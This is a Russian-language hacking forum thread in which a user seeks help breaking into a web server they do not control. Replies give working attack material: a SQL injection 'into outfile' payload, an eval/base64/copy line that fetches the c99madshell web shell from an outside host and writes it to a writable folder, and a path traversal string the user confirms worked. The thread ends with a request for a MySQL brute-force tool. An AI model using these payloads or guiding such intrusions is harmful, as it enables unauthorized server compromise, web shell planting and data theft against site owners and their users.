ПМА на сервере с сайтом (сервер 1)
Эксплойт на другом сервере (сервер 2)
TXT файл с командами для эксплойта (сервер 3)
т.е. вот конф файл эксплойта


Что у меня есть:
Эксплойт пма через Setup.php, возможность использовать стандартные команды на сервере ограниченного пользователя (просмотр всего содержимого, инфу сервера), использование коротких пхп скриптов.
SQL Inj, Могу просматривать таблицы, колонки (минус в том что могу просматривать только с помощью limit или group_concat, пользователей очень много и найти среди них админа (Хоть и знаю логин) этими методами займут очень много времени (если ошибаюсь поправьте меня) и не факт что в админке будет аплоад), так же могу просматривать файлы с помощью LOAD_FILE
Папки 777


Чего не могу:
експлойт пма: Не могу выполнять команды "перемещения, записи, редактирования, удаления, переименовывания, инклюды, архивация, дампы и тд."
SQL INJ: залить файл на сервер (из за ковычек), прочитать конфигурационные файлы "config.php"
Не могу выйти за пределы папки www с помощью експлойта пма, а с помощью SQL INJ могу
Не могу увидеть на экране ошибки которые выдает mysql, а где он хранит логи я не знаю =(

1. Исполнение есть, но ограниченное, не знаю как объяснить на научном но некоторые команды пашут а некоторые нет, и после каждой команды идет закрытие работы с сервером.

2. Рутового доступа в пма у меня нету, у меня есть доступ под юзверем apache который состоит в ограниченной группе apache. и рутовый доступ SQL INJ.

allow_url_fopen On
allow_url_include Нету такого
disable_functions no value
magic_quotes_gpc On
open_basedir .
safe_mode Off

-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/'+from+mysql.user--

Вроде бы все написал и не где не ошибся)

Я так понимаю, ты утверждаешь, что там нет инъекции?
Или в этих базах вообще невозможна инъекция?
Или что ты хотел этим сказать?

И при чём тут "низкий уровень"? Ты просто прочитал это там, и теперь не разобравшись о чём речь везде это пишешь, или у тебя есть свой взгляд на это, и ты способен своими словами, без линков описать мне, ЧТО ТЫ ХОТЕЛ ЭТИМ СКАЗАТЬ?

1. Да нет инъекции
2. -//-//-//-//-
3. -//-//-//-//-
4. ?
5. Да я просто прочитал это и везде пишу, у меня нету никаких взглядов на это.

p.s. видимо я ошибался=( т.к.
https://forum.antichat.net/showpost.php?p=474995&postcount=1

Не думаю что такое возможно. Не знаю что там у тебя за сплоит, но если он выполняет код, и есть папка на запись, то и шелл он зальёт. Просто ты что-то не так делаешь.

Кавычки тут роль особую не играют, тебе уже сказали что нужно сделать:
ev=eval(base64_decode(copy("http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php"));

Только разумеется вот это
"http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");
кодируешь в бейс

При твоих настройках должно работать без проблем.
Хотя, я ХЗ что там у тебя за чудосплоит

========================

pinch
ОК, ты пожалуйста будь повнимательнее, и прежде чем советовать что-то посмотри и проверь сам. Скуль там есть, разумеется, просто фильтрация union и select.
Ну и уж конечно, в этих базах, как и во всех других без проблем проводятся скули, просто как и везде своя специфика

ok=)...

коqда заливаем шелл c sql только из mysql.user мойно заливать?
а например если нето mysql.user-a мойно заливать шелл из напримерь с admin или users table-oм ?

Из mysql.user можно узнать хватает ли прав, именно это подразумевается по идее, а собственно код шелла можно писать откуда угодно.

Вот тут самое интересное, base64 не работает не у меня на компе не на сервере. нечего не выдает и нечего не сохраняет)

Если чисто copy, на моем компе сохраняет шелл, на сервере выполняется нормально но файл не появляется)

И вот еще вопрос, зависит ли это на заливку:

по умолчанию я нахожусь (выполняю команды из/от) по адресу /home/data/www/myadmin/scripts/ но сохраняю через скрипт в каталог /home/data/www/images/tep но пользователем apache я не могу выйти за пределы www

Так вот может надо писать так:
../home/data/www/images/tep
или так
/www/images/tep
или так
../../../home/data/www/images/tep
или даже так
../../../images/tep / ?

пы.сы. права на папки все проставлены 100%

Все, всем пасиб =)
../../../../../home/data/www/images/tep
Вот так вот пошло))

Подскажите плиз брут для mysql на удаленном хосте на 3306 порту (если есть такое)!